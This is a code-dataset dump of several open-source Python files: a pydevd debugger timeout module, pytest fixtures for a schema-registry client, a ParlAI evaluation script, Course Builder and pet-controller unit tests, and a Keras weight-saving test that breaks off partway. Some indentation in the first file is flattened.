Dataset schema (one row per source file; ⌀ marks a nullable column):

| column | type | values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 1 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 value |
| max_stars_repo_path | string | length 3 to 239 |
| max_stars_repo_name | string | length 5 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 ⌀ | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string ⌀ | length 24 |
| max_stars_repo_stars_event_max_datetime | string ⌀ | length 24 |
| max_issues_* | mirrors the max_stars_* columns | max_issues_count: int64 ⌀, 1 to 67k |
| max_forks_* | mirrors the max_stars_* columns | max_forks_count: int64 ⌀, 1 to 105k |
| content | string | length 1 to 1.03M |
| avg_line_length | float64 | 1 to 958k |
| max_line_length | int64 | 1 to 1.03M |
| alphanum_fraction | float64 | 0 to 1 |

hexsha: 4a18cafc2cc5f5c78a0ca6d78cbd2dcfbb268d80 | size: 8,366 | ext: py | lang: Python
path: Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_timeout.py
repo: edupyter/EDUPYTER38 @ 396183cea72987506f1ef647c0272a2577c56218 | licenses: ["bzip2-1.0.6"]
stars: null | issues: null | forks: null
from _pydev_bundle._pydev_saved_modules import threading
from _pydevd_bundle.pydevd_daemon_thread import PyDBDaemonThread
from _pydevd_bundle.pydevd_constants import thread_get_ident, IS_CPYTHON, NULL
import ctypes
import time
from _pydev_bundle import pydev_log
import weakref
from _pydevd_bundle.pydevd_utils import is_current_thread_main_thread
from _pydevd_bundle import pydevd_utils
_DEBUG = False # Default should be False as this can be very verbose.
class _TimeoutThread(PyDBDaemonThread):
    '''
    The idea of this class is that it usually sits waiting for the next event
    (paused in a threading.Event.wait). When a new handle is added, the event
    is set so that the thread processes the handles and then goes back to
    waiting as needed. This is done so that it's a bit more optimized than
    creating many Timer threads.
    '''
def __init__(self, py_db):
PyDBDaemonThread.__init__(self, py_db)
self._event = threading.Event()
self._handles = []
        # We could probably make this work without the lock (so handles could
        # be added while processing), but the implementation would be harder
        # to follow, so, for now, we're either processing or adding handles,
        # never both at the same time.
self._lock = threading.Lock()
def _on_run(self):
wait_time = None
while not self._kill_received:
if _DEBUG:
if wait_time is None:
pydev_log.critical('pydevd_timeout: Wait until a new handle is added.')
else:
pydev_log.critical('pydevd_timeout: Next wait time: %s.', wait_time)
self._event.wait(wait_time)
if self._kill_received:
self._handles = []
return
wait_time = self.process_handles()
def process_handles(self):
        '''
        :return float:
            Returns the time we should wait before processing the next event,
            or None if there are no pending handles.
        '''
with self._lock:
if _DEBUG:
pydev_log.critical('pydevd_timeout: Processing handles')
self._event.clear()
handles = self._handles
new_handles = self._handles = []
# Do all the processing based on this time (we want to consider snapshots
# of processing time -- anything not processed now may be processed at the
# next snapshot).
curtime = time.time()
min_handle_timeout = None
for handle in handles:
if curtime < handle.abs_timeout and not handle.disposed:
# It still didn't time out.
if _DEBUG:
pydev_log.critical('pydevd_timeout: Handle NOT processed: %s', handle)
new_handles.append(handle)
if min_handle_timeout is None:
min_handle_timeout = handle.abs_timeout
elif handle.abs_timeout < min_handle_timeout:
min_handle_timeout = handle.abs_timeout
else:
if _DEBUG:
pydev_log.critical('pydevd_timeout: Handle processed: %s', handle)
# Timed out (or disposed), so, let's execute it (should be no-op if disposed).
handle.exec_on_timeout()
if min_handle_timeout is None:
return None
else:
timeout = min_handle_timeout - curtime
if timeout <= 0:
pydev_log.critical('pydevd_timeout: Expected timeout to be > 0. Found: %s', timeout)
return timeout
def do_kill_pydev_thread(self):
PyDBDaemonThread.do_kill_pydev_thread(self)
with self._lock:
self._event.set()
def add_on_timeout_handle(self, handle):
with self._lock:
self._handles.append(handle)
self._event.set()
class _OnTimeoutHandle(object):
def __init__(self, tracker, abs_timeout, on_timeout, kwargs):
self._str = '_OnTimeoutHandle(%s)' % (on_timeout,)
self._tracker = weakref.ref(tracker)
self.abs_timeout = abs_timeout
self.on_timeout = on_timeout
if kwargs is None:
kwargs = {}
self.kwargs = kwargs
self.disposed = False
def exec_on_timeout(self):
# Note: lock should already be obtained when executing this function.
kwargs = self.kwargs
on_timeout = self.on_timeout
if not self.disposed:
self.disposed = True
self.kwargs = None
self.on_timeout = None
try:
if _DEBUG:
pydev_log.critical('pydevd_timeout: Calling on timeout: %s with kwargs: %s', on_timeout, kwargs)
on_timeout(**kwargs)
except Exception:
pydev_log.exception('pydevd_timeout: Exception on callback timeout.')
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
tracker = self._tracker()
if tracker is None:
lock = NULL
else:
lock = tracker._lock
with lock:
self.disposed = True
self.kwargs = None
self.on_timeout = None
def __str__(self):
return self._str
__repr__ = __str__
class TimeoutTracker(object):
'''
This is a helper class to track the timeout of something.
'''
def __init__(self, py_db):
self._thread = None
self._lock = threading.Lock()
self._py_db = weakref.ref(py_db)
def call_on_timeout(self, timeout, on_timeout, kwargs=None):
'''
This can be called regularly to always execute the given function after a given timeout:
call_on_timeout(py_db, 10, on_timeout)
Or as a context manager to stop the method from being called if it finishes before the timeout
elapses:
with call_on_timeout(py_db, 10, on_timeout):
...
Note: the callback will be called from a PyDBDaemonThread.
'''
with self._lock:
if self._thread is None:
if _DEBUG:
pydev_log.critical('pydevd_timeout: Created _TimeoutThread.')
self._thread = _TimeoutThread(self._py_db())
self._thread.start()
curtime = time.time()
handle = _OnTimeoutHandle(self, curtime + timeout, on_timeout, kwargs)
if _DEBUG:
pydev_log.critical('pydevd_timeout: Added handle: %s.', handle)
self._thread.add_on_timeout_handle(handle)
return handle
def create_interrupt_this_thread_callback():
'''
The idea here is returning a callback that when called will generate a KeyboardInterrupt
in the thread that called this function.
If this is the main thread, this means that it'll emulate a Ctrl+C (which may stop I/O
and sleep operations).
For other threads, this will call PyThreadState_SetAsyncExc to raise
a KeyboardInterrupt before the next instruction (so, it won't really interrupt I/O or
sleep operations).
:return callable:
Returns a callback that will interrupt the current thread (this may be called
from an auxiliary thread).
'''
tid = thread_get_ident()
if is_current_thread_main_thread():
main_thread = threading.current_thread()
def raise_on_this_thread():
pydev_log.debug('Callback to interrupt main thread.')
pydevd_utils.interrupt_main_thread(main_thread)
else:
# Note: this works in the sense that it can stop some cpu-intensive slow operation,
# but we can't really interrupt the thread out of some sleep or I/O operation
# (this will only be raised when Python is about to execute the next instruction).
def raise_on_this_thread():
if IS_CPYTHON:
pydev_log.debug('Interrupt thread: %s', tid)
ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), ctypes.py_object(KeyboardInterrupt))
else:
pydev_log.debug('It is only possible to interrupt non-main threads in CPython.')
return raise_on_this_thread
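
A minimal standalone sketch of the same mechanism (the worker function and timings are illustrative, not part of pydevd): raising an async KeyboardInterrupt in a CPython worker thread via PyThreadState_SetAsyncExc, exactly as `raise_on_this_thread` does above.

```python
import ctypes
import threading
import time

def busy_worker():
    try:
        while True:
            pass  # CPU-bound loop; the async exception lands between bytecodes
    except KeyboardInterrupt:
        print('worker interrupted')

worker = threading.Thread(target=busy_worker)
worker.start()
time.sleep(0.5)  # give the worker time to enter its loop
# Returns the number of thread states modified; 1 means success.
modified = ctypes.pythonapi.PyThreadState_SetAsyncExc(
    ctypes.c_long(worker.ident), ctypes.py_object(KeyboardInterrupt))
assert modified == 1
worker.join()
```

As the docstring above notes, this cannot break a thread out of a sleep or I/O call; the exception is only raised when the interpreter is about to execute the next bytecode.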
avg_line_length: 34.858333 | max_line_length: 116 | alphanum_fraction: 0.619412

hexsha: 4a18cb35fb73cc714307c4e53c5a1ddc24c992d8 | size: 3,346 | ext: py | lang: Python
path: tests/conftest.py
repo: Naillik1/python-schema-registry-client @ 2a69fe619cb2409eed1ac82d79048c0f68818b29 | licenses: ["MIT"]
stars: null | issues: null | forks: null
import logging
import os
import pytest
from schema_registry.client import SchemaRegistryClient, errors, schema
from schema_registry.serializers import MessageSerializer
logger = logging.getLogger(__name__)
CERTIFICATES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "certificates")
flat_schemas = {
"deployment_schema": {
"type": "record",
"namespace": "com.kubertenes",
"name": "AvroDeployment",
"fields": [
{"name": "image", "type": "string"},
{"name": "replicas", "type": "int"},
{"name": "port", "type": "int"},
],
},
"country_schema": {
"type": "record",
"namespace": "com.example",
"name": "AvroSomeSchema",
"fields": [{"name": "country", "type": "string"}],
},
"user_schema_v3": {
"type": "record",
"name": "User",
"aliases": ["UserKey"],
"fields": [
{"name": "name", "type": "string"},
{"name": "favorite_number", "type": ["int", "null"], "default": 42},
{"name": "favorite_color", "type": ["string", "null"], "default": "purple"},
{"name": "country", "type": ["null", "string"], "default": None},
],
},
}
class Response:
def __init__(self, status_code, content=None):
self.status_code = status_code
if content is None:
content = {}
self.content = content
def json(self):
return self.content
@pytest.fixture
def response_klass():
return Response
@pytest.fixture
def client():
url = os.getenv("SCHEMA_REGISTRY_URL", "http://schema-registry-server:8081")
client = SchemaRegistryClient(url)
yield client
subjects = {
"test-basic-schema",
"test-deployment",
"test-country",
"test-basic-schema-backup",
"test-advance-schema",
"test-user-schema",
"subject-does-not-exist",
"test-logical-types-schema",
"test-schema-version",
"test-nested-schema",
}
    # Clean up: delete all the subjects between tests.
for subject in subjects:
try:
client.delete_subject(subject)
except errors.ClientError as exc:
logger.info(exc.message)
@pytest.fixture
def schemas():
return flat_schemas
@pytest.fixture
def deployment_schema():
return schema.AvroSchema(flat_schemas.get("deployment_schema"))
@pytest.fixture
def country_schema():
return schema.AvroSchema(flat_schemas.get("country_schema"))
@pytest.fixture
def user_schema_v3():
"""
The user V2 is:
{
"type": "record",
"name": "User",
"aliases": ["UserKey"],
"fields": [
{"name": "name", "type": "string"},
{"name": "favorite_number", "type": ["int", "null"], "default": 42},
{"name": "favorite_color", "type": ["string", "null"], "default": "purple"}
]
}
"""
return schema.AvroSchema(flat_schemas.get("user_schema_v3"))
@pytest.fixture
def message_serializer(client):
return MessageSerializer(client)
@pytest.fixture
def certificates():
return {
"certificate": os.path.join(CERTIFICATES_DIR, "cert.pem"),
"key": os.path.join(CERTIFICATES_DIR, "key.pem"),
"password": "test",
}
avg_line_length: 24.970149 | max_line_length: 92 | alphanum_fraction: 0.578004

hexsha: 4a18cbceab7a27d7162f3e6e668d6fd67c2ef7e3 | size: 10,861 | ext: py | lang: Python
path: from_parlai/eval_model.py
repo: skywalker023/focused-empathy @ 04bdd0cf2fcd7bb4ee204cacb54ce970f426c916 | licenses: ["MIT"]
stars: 29 (2021-09-07T06:54:23.000Z to 2022-03-25T12:33:04.000Z) | issues: 8 (2021-09-25T05:39:40.000Z to 2022-03-29T07:04:08.000Z) | forks: 2 (2021-11-07T08:27:38.000Z to 2022-01-09T05:28:41.000Z)
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Basic example which iterates through the tasks specified and evaluates the given model
on them.
## Examples
```shell
parlai eval_model -t "babi:Task1k:2" -m "repeat_label"
parlai eval_model -t "#CornellMovie" -m "ir_baseline" -mp "-lp 0.5"
```
"""
from parlai.core.params import ParlaiParser, print_announcements
from parlai.core.agents import create_agent
from parlai.core.logs import TensorboardLogger
from parlai.core.metrics import (
aggregate_named_reports,
aggregate_unnamed_reports,
Metric,
)
from parlai.core.worlds import create_task
from parlai.utils.misc import TimeLogger, nice_report
from parlai.utils.world_logging import WorldLogger
from parlai.core.script import ParlaiScript, register_script
from parlai.utils.io import PathManager
import parlai.utils.logging as logging
from parlai.core.metrics import AverageMetric
import os
import json
import random
from tqdm import tqdm
from copy import deepcopy
import torch
from parlai.utils.distributed import (
is_primary_worker,
all_gather_list,
is_distributed,
get_rank,
)
from modules.empathy_scorer import EmpathyScorer
from zoo.blender.build import download as download_blender
def setup_args(parser=None):
if parser is None:
parser = ParlaiParser(True, True, 'Evaluate a model')
# Get command line arguments
parser.add_argument(
'-rf',
'--report-filename',
type=str,
default='',
help='Saves a json file of the evaluation report either as an '
'extension to the model-file (if begins with a ".") or a whole '
'file path. Set to the empty string to not save at all.',
)
parser.add_argument(
'--save-world-logs',
type='bool',
default=False,
help='Saves a jsonl file containing all of the task examples and '
'model replies. Must also specify --report-filename.',
)
parser.add_argument(
'--save-format',
type=str,
default='conversations',
choices=['conversations', 'parlai'],
)
parser.add_argument('-ne', '--num-examples', type=int, default=-1)
parser.add_argument('-d', '--display-examples', type='bool', default=False)
parser.add_argument(
'--display-add-fields',
type=str,
default='full_text',
help='Specify extra fields for display'
)
parser.add_argument('-ltim', '--log-every-n-secs', type=float, default=10)
parser.add_argument(
'-mcs',
'--metrics',
type=str,
default='default',
help='list of metrics to show/compute, e.g. all, default,'
'or give a list split by , like '
'ppl,f1,accuracy,hits@1,rouge,bleu'
'the rouge metrics will be computed as rouge-1, rouge-2 and rouge-l',
)
parser.add_argument(
'-micro',
'--aggregate-micro',
type='bool',
default=False,
help='Report micro-averaged metrics instead of macro averaged metrics.',
recommended=False,
)
parser.add_argument(
'--empathy-score',
type='bool',
default=False,
help="Compute empathy identification score if true (please see the paper {A Computational Approach to Understanding Empathy Expressed in Text-Based Mental Health Support} for more details)",
)
WorldLogger.add_cmdline_args(parser)
TensorboardLogger.add_cmdline_args(parser)
parser.set_params(datatype='test')
return parser
def _save_eval_stats(opt, report):
    if not is_primary_worker():
return
report_fname = opt['report_filename']
if report_fname == '':
return
json_serializable_report = report
for k, v in report.items():
if isinstance(v, Metric):
v = v.value()
json_serializable_report[k] = v
# Save report
with PathManager.open(report_fname, 'w') as f:
logging.info(f'Saving model report to {report_fname}')
json.dump({'opt': opt, 'report': json_serializable_report}, f, indent=4)
f.write("\n") # for jq
def _eval_single_world(
opt, agent, task,
    epitome_empathy_scorer: EmpathyScorer = None,
):
logging.info(f'Evaluating task {task} using datatype {opt.get("datatype")}.')
# set up world logger
world_logger = WorldLogger(opt) if opt['save_world_logs'] else None
task_opt = opt.copy() # copy opt since we're editing the task
task_opt['task'] = task
world = create_task(task_opt, agent) # create worlds for tasks
# set up logging
log_every_n_secs = opt.get('log_every_n_secs', -1)
if log_every_n_secs <= 0:
log_every_n_secs = float('inf')
log_time = TimeLogger()
# max number of examples to evaluate
max_cnt = opt['num_examples'] if opt['num_examples'] > 0 else float('inf')
pbar_desc = "Generation"
if max_cnt == float('inf'):
try:
pbar = tqdm(total=world.worlds[0].agents[0].num_examples(), desc=pbar_desc)
except AttributeError as e:
pbar = tqdm(total=world.agents[0].num_examples(), desc=pbar_desc)
else:
pbar = tqdm(total=max_cnt, desc=pbar_desc)
cnt = 0
total_cnt = world.num_examples()
dump_dir = os.path.dirname(opt['report_filename'])
if dump_dir != '':
os.makedirs(dump_dir, exist_ok=True)
report_filename = opt['report_filename'].split('/')[-1]
if opt.get('num_generation_split', 1) > 1:
current_split = opt['current_split']
dump_fname = os.path.join(
dump_dir, f'{report_filename}_dump_split{current_split}.jsonl')
else:
dump_fname = os.path.join(dump_dir, f'{report_filename}_dump.jsonl')
dump_fp = open(dump_fname, 'w')
if is_distributed():
logging.warn('Progress bar is approximate in distributed mode.')
if epitome_empathy_scorer:
IP_scores = []
EX_scores = []
while not world.epoch_done() and cnt < max_cnt:
cnt += opt.get('batchsize', 1)
world.parley()
if world_logger is not None:
world_logger.log(world)
if opt['display_examples'] and cnt % (50 * opt.get('batchsize')) == 0:
# display examples
print(world.display() + '\n~~')
if log_time.time() > log_every_n_secs:
report = world.report()
text, report = log_time.log(
report.get('exs', 0), min(max_cnt, total_cnt), report
)
logging.info(text)
pbar.update(cnt - pbar.n)
# Prepare input for computing empathy score
if epitome_empathy_scorer:
seeker_posts = []
response_posts = []
for w in world.worlds:
teacher_act = w.acts[0]
agent_act = w.acts[1]
seeker_post = teacher_act.get('text', None)
response_post = agent_act.get('text', None)
if seeker_post is None or response_post is None:
continue
seeker_posts.append(seeker_post)
response_posts.append(response_post)
# Compute empathy score
if epitome_empathy_scorer and len(seeker_posts) > 0:
empathy_scores = epitome_empathy_scorer(seeker_posts, response_posts)
IP_scores += empathy_scores['IP'][0]
EX_scores += empathy_scores['EX'][0]
for w in world.worlds:
teacher_act = w.acts[0]
agent_act = deepcopy(w.acts[1])
try:
for key in agent_act['metrics'].keys():
agent_act['metrics'][key] = agent_act['metrics'][key].value()
except KeyError as e:
# Invalid batch
continue
all_acts = {'teacher': teacher_act, 'agent': agent_act}
if dump_dir != '':
dump_fp.write(json.dumps(all_acts) + '\n')
dump_fp.flush()
pbar.close()
if dump_dir != '':
dump_fp.close()
if world_logger is not None:
# dump world acts to file
world_logger.reset() # add final acts to logs
base_outfile = opt['report_filename']
if is_distributed():
rank = get_rank()
outfile = base_outfile + f'_{task}_{rank}_replies.jsonl'
else:
outfile = base_outfile + f'_{task}_replies.jsonl'
world_logger.write(outfile, world, file_format=opt['save_format'])
_report = world.report()
if epitome_empathy_scorer:
_report['empathy_epitome_IP'] = AverageMetric(sum(IP_scores), len(IP_scores))
_report['empathy_epitome_EX'] = AverageMetric(sum(EX_scores), len(EX_scores))
report = aggregate_unnamed_reports(all_gather_list(_report))
world.reset()
return report
def eval_model(opt):
"""
Evaluates a model.
:param opt: tells the evaluation function how to run
:return: the final result of calling report()
"""
    device = list(range(torch.cuda.device_count()))[-1]  # last CUDA device; assumes at least one GPU is present
random.seed(42)
if 'train' in opt['datatype'] and 'evalmode' not in opt['datatype']:
raise ValueError(
'You should use --datatype train:evalmode if you want to evaluate on '
'the training set.'
)
if opt['save_world_logs'] and not opt['report_filename']:
raise RuntimeError(
'In order to save model replies, please specify the save path '
'with --report-filename'
)
epitome_empathy_scorer = None
if opt['empathy_score']:
epitome_empathy_scorer = EmpathyScorer(opt, batch_size=1, cuda_device=device)
if 'Blender' in opt['model']:
download_blender(opt['datapath'])
# load model and possibly print opt
agent = create_agent(opt, requireModelExists=True)
agent.opt.log()
tasks = opt['task'].split(',')
reports = []
for task in tasks:
task_report = _eval_single_world(opt, agent, task,
epitome_empathy_scorer)
reports.append(task_report)
report = aggregate_named_reports(
dict(zip(tasks, reports)), micro_average=opt.get('aggregate_micro', False)
)
    # print announcements and report
print_announcements(opt)
logging.info(
f'Finished evaluating tasks {tasks} using datatype {opt.get("datatype")}'
)
print(nice_report(report))
_save_eval_stats(opt, report)
return report
@register_script('eval_model', aliases=['em', 'eval'])
class EvalModel(ParlaiScript):
@classmethod
def setup_args(cls):
return setup_args()
def run(self):
return eval_model(self.opt)
if __name__ == '__main__':
EvalModel.main()
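
Since `EvalModel` is registered as a ParlaiScript, it can also be invoked programmatically through `ParlaiScript.main` kwargs; a hedged sketch (the task name and model path below are placeholders, not values from this repository):

```python
# Keyword arguments become opt entries, mirroring the CLI flags defined in
# setup_args above.
report = EvalModel.main(
    task='empathetic_dialogues',   # placeholder task
    model_file='/path/to/model',   # placeholder checkpoint path
    report_filename='report.json',
)
```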
avg_line_length: 32.713855 | max_line_length: 198 | alphanum_fraction: 0.631065

hexsha: 4a18cbe12916f40f4a6339f4a56718d7af9fc872 | size: 3,124 | ext: py | lang: Python
path: tests/functional_tests.py
repo: google/coursebuilder-hello-world-module @ 4429cc9a53c8edd5745d9e9535cf4d8b8c126f40 | licenses: ["Apache-2.0"]
stars: 7 (2016-02-11T19:39:31.000Z to 2021-04-20T20:38:14.000Z) | issues: 2 (2015-04-16T22:37:15.000Z to 2015-04-17T21:27:04.000Z) | forks: 7 (2017-07-25T21:33:39.000Z to 2021-10-12T02:35:14.000Z)
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functional tests for the Course Builder Hello World module.
These tests provide examples of how to test global and namespaced handlers, as
well as authenticated and unauthenticated users.
"""
from modules.hello import hello
from tests.functional import actions
class _TestBase(actions.TestBase):
def setUp(self):
super(_TestBase, self).setUp()
self.user_email = 'test@example.com'
def assert_course_title_in(self, course_title, response):
self.assertIn('Welcome to ' + course_title, response.body)
def assert_authenticated_response_looks_correct(
self, response, course_title=None):
self.assertEqual(200, response.status_code)
self.assertIn(self.user_email, response.body)
self.assertIn('Sign out', response.body)
if course_title:
self.assert_course_title_in(course_title, response)
def assert_unauthenticated_response_looks_correct(
self, response, course_title=None):
self.assertEqual(200, response.status_code)
self.assertIn('Please sign in', response.body)
if course_title:
self.assert_course_title_in(course_title, response)
class GlobalHandlerTest(_TestBase):
def test_authenticated_response_looks_correct(self):
actions.login(self.user_email)
self.assert_authenticated_response_looks_correct(
self.testapp.get(hello.GlobalHandler.URL))
def test_unauthenticated_response_looks_correct(self):
self.assert_unauthenticated_response_looks_correct(
self.testapp.get(hello.GlobalHandler.URL))
class NamespacedHandlerTest(_TestBase):
def setUp(self):
super(NamespacedHandlerTest, self).setUp()
self.admin_email = 'admin@example.com'
self.course_name = 'test_course'
self.course_title = 'Test Course'
self.namespaced_url = '/%s%s' % (
self.course_name, hello.NamespacedHandler.URL)
actions.simple_add_course(
self.course_name, self.admin_email, self.course_title)
def test_authenticated_response_looks_correct(self):
actions.login(self.user_email)
self.assert_authenticated_response_looks_correct(
self.testapp.get(self.namespaced_url),
course_title=self.course_title)
def test_unauthenticated_response_looks_correct(self):
self.assert_unauthenticated_response_looks_correct(
self.testapp.get(self.namespaced_url),
course_title=self.course_title)
avg_line_length: 35.101124 | max_line_length: 78 | alphanum_fraction: 0.723752

hexsha: 4a18cc141c2c6f8bab7febc2e7a632954d716e7b | size: 3,718 | ext: py | lang: Python
path: {{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/tests/controllers/test_pet.py
repo: srikiran1/cookiecutter-connexion-microcosm-service @ da1dea38e08379e8415202b6aed23f79d2d9d24d | licenses: ["MIT"]
stars: 2 (2019-12-10T03:08:09.000Z to 2019-12-10T03:08:11.000Z) | issues: null | forks: 1 (2019-12-10T03:08:03.000Z to 2019-12-10T03:08:03.000Z)
from hamcrest import assert_that, is_, equal_to, calling, raises
from mock import Mock, patch
from werkzeug.exceptions import NotFound
from {{ cookiecutter.project_name }}.controllers.pet import PetController
class TestPetController(object):
def setup(self):
self.graph = Mock()
self.controller = PetController(self.graph)
@patch("{{ cookiecutter.project_name }}.controllers.pet.Pet.to_list_dict")
def test_find_pets(self, mock_to_list_dict):
tags = ["a", "b"]
limit = 10
offset = 0
order_by = "created"
direction = "ASCENDING"
total_count = 100
self.controller.store.count.return_value = total_count
assert_that(self.controller.find_pets(tags, limit, offset, order_by, direction),
is_(equal_to((mock_to_list_dict.return_value, 200))))
mock_to_list_dict.assert_called_once_with(items=self.controller.store.find.return_value,
total_count=total_count,
limit=limit,
offset=offset,
order_by=order_by,
direction=direction)
self.controller.store.find.assert_called_once_with(tags=tags,
limit=limit,
offset=offset,
order_by=order_by,
direction=direction)
self.controller.store.count.assert_called_once_with(tags=tags)
def test_find_pets_with_offset_beyond_total_count(self):
tags = ["a", "b"]
limit = 10
order_by = "created"
direction = "ASCENDING"
total_count = 100
offset = total_count + 1
self.controller.store.count.return_value = total_count
assert_that(calling(self.controller.find_pets).with_args(tags, limit, offset, order_by, direction),
raises(ValueError))
@patch("{{ cookiecutter.project_name }}.controllers.pet.Pet.from_dict")
def test_add_pet(self, mock_from_dict):
pet = Mock()
assert_that(self.controller.add_pet(pet),
is_(equal_to((self.controller.store.create.return_value.to_dict.return_value, 201))))
self.controller.store.create.assert_called_once_with(mock_from_dict.return_value)
self.controller.store.create.return_value.to_dict.assert_called_once_with()
mock_from_dict.assert_called_once_with(pet, create=True)
def test_find_pet_by_id(self):
id_ = "some_id"
assert_that(self.controller.find_pet_by_id(id_=id_),
is_(equal_to((self.controller.store.retrieve.return_value.to_dict.return_value, 200))))
self.controller.store.retrieve.assert_called_once_with(identifier=id_)
self.controller.store.retrieve.return_value.to_dict.assert_called_once_with()
def test_delete_pet(self):
id_ = "some_id"
assert_that(self.controller.delete_pet(id_=id_), is_(equal_to((None, 204))))
self.controller.store.retrieve.assert_called_once_with(identifier=id_)
self.controller.store.delete.assert_called_once_with(identifier=id_)
def test_delete_pet_not_existing(self):
id_ = "some_id"
self.controller.store.retrieve.return_value = None
assert_that(calling(self.controller.delete_pet).with_args(id_=id_), raises(NotFound))
self.controller.store.retrieve.assert_called_once_with(identifier=id_)
avg_line_length: 41.775281 | max_line_length: 107 | alphanum_fraction: 0.61646

hexsha: 4a18cc2e119d7cfb3f15da593d4944abd445905b | size: 15,944 | ext: py | lang: Python
path: tensorflow/python/keras/_impl/keras/engine/saving_test.py
stars: Pravo21/tensorflow @ 10be1f2377bf7aad1a4cfa306277c53e44493a57, ["Apache-2.0"], count 13 (2018-07-23T18:53:35.000Z to 2021-11-18T19:56:45.000Z)
issues: sysufuchao/tensorflow @ 10be1f2377bf7aad1a4cfa306277c53e44493a57, ["Apache-2.0"], count null
forks: sysufuchao/tensorflow @ 10be1f2377bf7aad1a4cfa306277c53e44493a57, ["Apache-2.0"], count 13 (2018-09-07T13:28:38.000Z to 2020-07-17T15:06:24.000Z)
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for model saving."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
import numpy as np
from tensorflow.python.keras._impl import keras
from tensorflow.python.platform import test
from tensorflow.python.training import training as training_module
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestWeightSavingAndLoading(test.TestCase):
def test_weight_loading(self):
with self.test_session():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
model = keras.models.Model(a, b)
x = np.random.random((3, 2))
ref_y = model.predict(x)
weights = model.get_weights()
model.set_weights(weights)
y = model.predict(x)
self.assertAllClose(ref_y, y)
with self.assertRaises(ValueError):
model.set_weights(weights[1:])
with self.assertRaises(ValueError):
model.set_weights(weights[::-1])
if h5py is None:
return # Skip rest of test if H5py isn't available.
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
model.save_weights(h5_path)
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.load_weights(h5_path, by_name=True)
y = model.predict(x)
self.assertAllClose(ref_y, y)
def test_weight_preprocessing(self):
input_dim = 3
output_dim = 3
size = 2
cases = [
[
(keras.layers.Bidirectional(keras.layers.SimpleRNN(2))),
[np.random.random((2, 1)), np.random.random((2, 1))],
(None, 3, 2),
],
[
(keras.layers.TimeDistributed(keras.layers.Dense(1))),
[np.random.random((2, 1)), np.random.random((1,))],
(None, 3, 2),
],
[
(keras.layers.Conv1D(output_dim, size, use_bias=False)),
[np.random.random((output_dim, input_dim, size, 1))],
(None, 4, input_dim),
],
[
(keras.layers.Conv2D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_last')),
[np.random.random((size, size, input_dim, output_dim))],
(None, 4, 4, input_dim),
],
[
(keras.layers.Conv3D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size, size))],
(None, input_dim, 4, 4, 4),
],
[
(keras.layers.GRU(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
[
(keras.layers.LSTM(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
]
for layer, weights, input_shape in cases:
layer.build(input_shape)
_ = keras.engine.saving.preprocess_weights_for_loading(
layer, weights, original_keras_version='1')
model = keras.models.Sequential([keras.layers.Dense(2, input_dim=2)])
_ = keras.engine.saving.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
x = keras.Input((2,))
y = keras.layers.Dense(2)(x)
model = keras.models.Model(x, y)
_ = keras.engine.saving.preprocess_weights_for_loading(
model, model.weights, original_keras_version='1')
def test_sequential_weight_loading(self):
if h5py is None:
return
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
num_hidden = 5
input_dim = 3
batch_size = 5
num_classes = 2
with self.test_session():
model = keras.models.Sequential()
